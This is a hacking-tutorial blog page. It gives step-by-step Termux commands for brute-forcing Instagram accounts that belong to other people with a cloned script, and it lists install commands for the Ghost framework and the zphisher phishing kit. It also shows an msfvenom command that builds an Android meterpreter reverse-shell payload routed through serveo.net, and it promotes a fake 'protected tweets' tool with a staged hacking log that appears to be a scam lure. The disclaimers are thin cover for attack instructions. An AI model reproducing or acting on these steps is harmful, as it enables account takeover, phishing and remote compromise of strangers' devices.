Skip to main content

HOW TO HACK INSTAGRAM


 Hello friends , Today I will show you how to hack Instagram. But You have to need one application this name is Termux . This app is avileble on play store .So you have to download this from Play stor. {This tutorial for education purpose only i’m not responsible for any thing.Spying into someone`s mobile without his/her permission is illegal. Please proceed in own risk.} There are millions of users every day and it turns out that Instagram accounts have a loop holes using which an intruder can hack Instagram account using many ways such as Phishing, Brute force attack and many. Today we will be using Brute Force attack to hack an Instagram Account (IG account).To start hacking Instagram by a brute force attack, first download the Termux App. using the Google Play store and install it on your Android device. After installing the application,

Follow the instruction below to Hack Instagram account using Termux application. 1. Open the Termux app, then update and upgrade the termux package by using the following command line. pkg update && pkg upgrade and press enter. 2. Then install git and jq using the foll. command below pkg install git && apt install jq -y 3. Next clone the script or tool from the link below to hack Instagram account git clone https://github.com/noolep/multiBF_ig/  4. When the clone is completed sucessfully, then enter the multiBF_ig folder with the following command cd multiBF_ig 5. Then run using the following command bash brute.sh 6. Then the option/menu will appear. 7. For example, if I choose number 1 Get Target From Specific @Username, with typing number 1 and then press enter. 8. Then we need to fill in queries and passwords that will be used for brute force. 9. If the query and password have been filled, then press enter to start hacking your Instagram account. 10. If there is an instagram account that was hacked successfully, then we can directly log in to the account using the Username and Password that we have filled or obtained. *Note- The above method can be filled with the Username of the Instagram account that you want to access to or hack it. The Password can be filled according to the instagram account username. “For example -if we fill in a Username with the name John, then we can try to guess the password with jack123, jack12345 jack321 and so on etc.” MultiBF_ig is also used for hacking instagram account with specific target list or hashtag.So that’s the way where we can hack an Instagram account using Termux on Android device 2020 with the Multi Brute Force method.

Tags:#Instagram hack#Instagram follower#in st a like#instahackLeave a commenton HOW TO HACK INSTAGRAM

Ghost framework command list

Ghost Framework:- For Termux-megapackeage User:- $ m-pkg Select Ghost $ apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh $ m-pkg Select Fake-Root Select Proot $ cd $ cd ghost $ chmod +x * $ ./install.sh $ ghost

MAGA-PAKAGE INSTALLATION COMMAND LIST

$ termux-setup-storage $ pkg update && pkg upgrade && pkg install git -y $ git clone https://github.com/Bhaviktutorials/Termux-Megapackage $ ls $ cd Termux-Megapackage $ ls $ chmod +x * $ ./install.sh $ m-pkg

Z-PHISHER COMMAND LIST FOR TERMUX APP

apt update apt install git php openssh curl -y git clone https://github.com/htr-tech/zphisher cd zphisher bash zphisher.sh bash zphisher.sh

TRACK LOCATION WITH YOUR ANDROID PHONE

DISCLAIMER This Tutorial is made for educational purpose only, I didn’t harm anyone everything shown an used in this Tutorial for testing belongs to me such as the computer, smartphone and my website. Every Tutorial on utopian.io is made to teach people how to stay safe and help others for making them safe. HACKING, CRACKING, STEALING OR ANY SUCH KIND OF ACTIVITY IS A CYBER CRIME WHICH CAN LAND YOU IN JAIL. I DO NOT SUPPORT ANY SUCH KIND OF ACTIVITY

  • IPGeoLocation GitHub https://github.com/maldevel/IPGeoLocation.git

Difficulty

  • Intermediate

procedure 1: First we need to setup Android Termux

  • Type command pkg update && pkg uograde && pkg install python && pkg install python2 and press Enter.

2: Now visit the GitHub Link

  • Link is given in Requirement copy the clone link as shown in this screenshot

  • Type the command pkg install git and press Enter.

3: Now we need to clone the IPGeoLocation in Termux.

  • Type command git clone (GitHub Link). Here the (GitHub Link) is the Git link that you copy in step-2 it may be like this git clone https://github.com/maldevel/IPGeoLocation.git and press Enter. Wait until it Finished.

  • Now type command ls you will see a file requirements.txt. These requirements are essential for this script. You can fulfilled all requirements by executing the command pip install -r requirements.txt and press Enter.

-Now change the permission Type command chmod +x ipgeolocation.py and press Enter.

Comments

Popular posts from this blog

HACK Android Device with TermuX on Android

  Requirements 1).  Android 5.0 ( Tutorial for Androids Lower Than 5.0 is HERE ) 2).  TermuX Android App (Download it from  Play Store 3).  Installed Metasploit Framework in TermuX ( Tutorial Here ) 4).  Active Internet/WiFi Connection 5).  TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage") 6).  MiXplorer (For signing APK file, Download it from  UpToDown Website ) 7).  MiX Signer (APK Signer for MiXplorer, Download it from  Play Store ) 8).  (Recommended) Use  Hacker`s Keyboard  for entering commands in TermuX easily. Step 1 Port Forwarding pkg install openssh — It will successfully install OpenSSH ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net —  Detail Below (Optional) Name this session: Port Forwarding Step 2 Creating APK File with Embedded Payload msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > stor...

learn how to hack andorid

  While hunting for bug bounties, attack surface plays a major role. Hacking on mobile adds more juicy attack surface and increases your likelihood of finding new endpoints… and bugs! For example, some applications use different API endpoints for mobile users, as well as use different endpoints for each platform. Mobile apps are likely to get less attention compared to the web applications or the domains that are in the scope of a program. Setting up a mobile lab for the first time can be confusing and exhausting. This blog will help you quickly learn how to get started on mobile hacking, for Android and iOS, by covering the following topics: Installing the Android SDK Setting up and launching a Virtual Device Downloading an APK file from the Google Store. Installing the APK on your Virtual Device Setting up Burp Suite with a Virtual Device Decompiling an APK file to extract the source code SET UP A VIRTUAL ANDROID DEVICE First, you’ll need to get the latest version of Android Stud...

How do I view protected tweets without following the person on Twitter?

  You can I view protected tweets without following the person on Twitter, by using this tool. >>>Use this tool to View protected tweets without following Twitter<<< >>>Use this tool to View protected tweets without following Twitter<<< ACCESS PHONE ONLINE > Connecting to the global server... Done > Initializing exploit functions... Done > Connecting to database... Failed > Retrying... > Attempt (2) to connect to database... Done > Attempt (1) to bypass the Security System... Buffering > Attempt (2) to bypass the Security System... Done > Sending requested amount of to your account... Buffering > Sending requested amount of to your account... Done > Changing packets in the database... Done > Disconnecting from the global server... Done > Disconnecting from the database... Done > Shutting down exploit functions... Done > Process was completed successfully. >>>Use this tool to View protected tweets...